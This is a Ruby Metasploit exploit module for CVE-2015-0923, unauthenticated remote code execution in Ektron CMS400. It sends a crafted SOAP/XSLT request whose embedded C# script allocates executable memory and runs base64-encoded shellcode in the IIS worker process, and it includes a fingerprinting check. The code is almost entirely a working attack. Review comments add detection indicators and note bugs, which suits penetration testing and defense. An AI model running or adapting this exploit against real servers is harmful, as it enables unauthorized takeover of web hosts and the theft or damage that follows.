##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Ektron CMS400 XSLT transform remote code execution (CVE-2015-0923, US-CERT VU#377644).
#
# The ServerControlWS.asmx web service accepts a caller-supplied XSLT document
# inside a SOAP request and applies it with a transform that honours
# msxsl:script, so C# embedded in the stylesheet runs inside the IIS worker
# process with no prior authentication (see 'Description' below).
#
# Two entry points share one request shape: `check` sends a transform whose
# script only echoes a random marker, `exploit` sends one whose script maps and
# starts the generated payload.
#
# Detection note: every request this module sends is an unauthenticated POST to
# <TARGETURI>WorkArea/ServerControlWS.asmx with a text/xml body that contains
# `<msxsl:script language="C#"` inside a CDATA section, plus a Referer built
# from the target's own host and port; none of these vary between runs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Module metadata and user-facing options.
  #
  # NOTE(review): HTTP_DELAY is registered here but is not read by any method
  # in this file, and its description mentions a "VBS payload request" that
  # this module never makes; it looks like a leftover from another module.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',
      'Description'    => %q{ Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have
        vulnerabilities in various operations within the ServerControlWS.asmx
        web services. These vulnerabilities allow for RCE without authentication and
        execute in the context of IIS on the remote system.
      },
      'Author'         => [
        'catatonicprime'
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-0923' ],
          [ 'US-CERT-VU', '377644' ],
          [ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]
        ],
      # The payload travels base64-encoded as text inside the stylesheet, so
      # Space bounds the size of the encoded payload the module will accept.
      'Payload'        =>
        {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      # Per the description the code runs as the IIS worker process identity.
      'Privileged'     => true,
      # Single target entry; both architectures are listed because the C#
      # loader is compiled by the server's own .NET runtime.
      'Targets'        =>
        [
          ['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X64, ARCH_X86 ] }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2015-02-05'
    ))

    register_options(
      [
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
        # Base path of the CMS install; uri_path normalises the trailing slash.
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),
        # Which ServerControlWS operation carries the stylesheet. The choice
        # changes the parameter name (see vulnerable_param) and the extra
        # child elements (see required_params); the transform itself is the same.
        OptEnum.new('TARGETOP',
          [
            true,
            'The vulnerable web service operation to exploit',
            'ContentBlockEx',
            [
              'ContentBlockEx',
              'GetBookmarkString',
              'GetContentFlaggingString',
              'GetContentRatingString',
              'GetMessagingString'
            ]
          ])
      ])
  end

  # Name of the SOAP element that carries the XSLT document: the ContentBlockEx
  # operation spells it 'Xslt', every other TARGETOP value spells it 'xslt'.
  def vulnerable_param
    return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'
    'xslt'
  end

  # Extra child element(s) the chosen operation needs ahead of the XSLT
  # element: none for ContentBlockEx, an empty <showmode/> for the others.
  def required_params
    return '' if datastore['TARGETOP'] == 'ContentBlockEx'
    '<showmode/>'
  end

  # Operation name used as the SOAP body element (taken verbatim from TARGETOP).
  def target_operation
    datastore['TARGETOP']
  end

  # Opening half of the request body: SOAP envelope, the chosen operation, any
  # required parameters, then the XSLT element whose CDATA holds a stylesheet
  # with an msxsl:script element left open. Callers append C# source after
  # this and close the document with `epilogue`.
  #
  # The heredoc body sits at column 0 so nothing precedes the XML declaration.
  def prologue
    <<-XSLT
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">
#{required_params}
<#{vulnerable_param}>
<![CDATA[
<xsl:transform version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="user">
    XSLT
  end

  # Closing half of the request body: ends the script element, adds a root
  # template that calls the script's xml() function and emits its return
  # value, then closes the CDATA section, parameter, operation and envelope.
  # The xml() return value is what `check` and `exploit` look for in the
  # response body.
  def epilogue
    <<-XSLT
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:transform>
]]>
</#{vulnerable_param}>
</#{target_operation}>
</soap:Body>
</soap:Envelope>
    XSLT
  end

  # Vulnerability check: runs a benign transform whose script returns only a
  # random alphabetic marker and looks for that marker in the response.
  #
  # Returns Exploit::CheckCode::Vulnerable when the service answers 200, the
  # marker appears in the body and the body does not contain "Error"; every
  # other outcome, including no response at all, is reported as Safe. The
  # /Error/ test is case-sensitive and unanchored, so any unrelated occurrence
  # of that word in the page makes the check report Safe.
  def check

    # 5 to 9 random letters; rand_text_alpha keeps the marker safe inside a C#
    # string literal and an XML CDATA section.
    fingerprint = rand_text_alpha(5 + rand(5))
    xslt_data = <<-XSLT
#{prologue}
public string xml() {
return "#{fingerprint}";
}
#{epilogue}
    XSLT

    res = send_request_cgi(
      {
        'uri'     => "#{uri_path}WorkArea/ServerControlWS.asmx",
        'version' => '1.1',
        'method'  => 'POST',
        'ctype'   => "text/xml; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'data'    => xslt_data
      })

    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  # Path component of TARGETURI with a trailing slash guaranteed, so callers
  # can append "WorkArea/ServerControlWS.asmx" directly.
  def uri_path
    # Local variable shadows the method name for the rest of the body.
    uri_path = target_uri.path
    # `<<` appends in place on the string object returned by target_uri.path.
    # NOTE(review): whether that object is shared with the datastore or URI
    # instance depends on target_uri's implementation — confirm before relying
    # on it.
    uri_path << "/" if uri_path[-1, 1] != "/"
    uri_path
  end

  # Builds "<scheme>://<rhost>:<rport><uri_path>" for the Referer header so the
  # request looks like it originated from the target's own pages. The scheme
  # follows the SSL option.
  def build_referer
    if datastore['SSL']
      schema = "https://"
    else
      schema = "http://"
    end

    # Each call evaluates a fresh string literal above, so appending in place
    # here does not leak state between calls.
    referer = schema
    referer << rhost
    referer << ":#{rport}"
    referer << uri_path
    referer
  end

  # Delivers the payload. The C# placed inside the stylesheet is an in-memory
  # loader: it base64-decodes the encoded payload embedded in the request
  # body, allocates memory with VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE),
  # copies the bytes in and starts a thread on them with CreateThread. Because
  # the payload travels base64-encoded inside the SOAP body, the full shellcode
  # is visible to anything that logs or inspects request bodies to this
  # endpoint.
  #
  # Success is judged exactly as in `check`; any other response ends the run
  # with Failure::Unknown and no retry.
  def exploit

    print_status("Generating the EXE Payload and the XSLT...")
    # Same 5 to 9 letter marker scheme as `check`; xml() returns it after the
    # loader has run, so its presence shows the script executed, not that the
    # payload connected back.
    fingerprint = rand_text_alpha(5 + rand(5))

    # NOTE(review): the loader never inspects hThread, so a failed
    # CreateThread is not reported — the server still returns the marker and
    # the module prints success.
    xslt_data = <<-XSLT
#{prologue}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

public string xml()
{
string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
byte[] shellcode = System.Convert.FromBase64String(shellcode64);
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
IntPtr hThread = IntPtr.Zero;
IntPtr pinfo = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
return "#{fingerprint}";
}
#{epilogue}
    XSLT

    print_status("Trying to run the xslt transformation...")
    # Identical request shape to `check`: same endpoint, content type and
    # Referer; only the script body differs.
    res = send_request_cgi(
      {
        'uri'     => "#{uri_path}WorkArea/ServerControlWS.asmx",
        'version' => '1.1',
        'method'  => 'POST',
        'ctype'   => "text/xml; charset=UTF-8",
        'headers' => {
          "Referer" => build_referer
        },
        'data'    => xslt_data
      })
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
      print_good("Exploitation was successful")
    else
      fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
    end

  end
end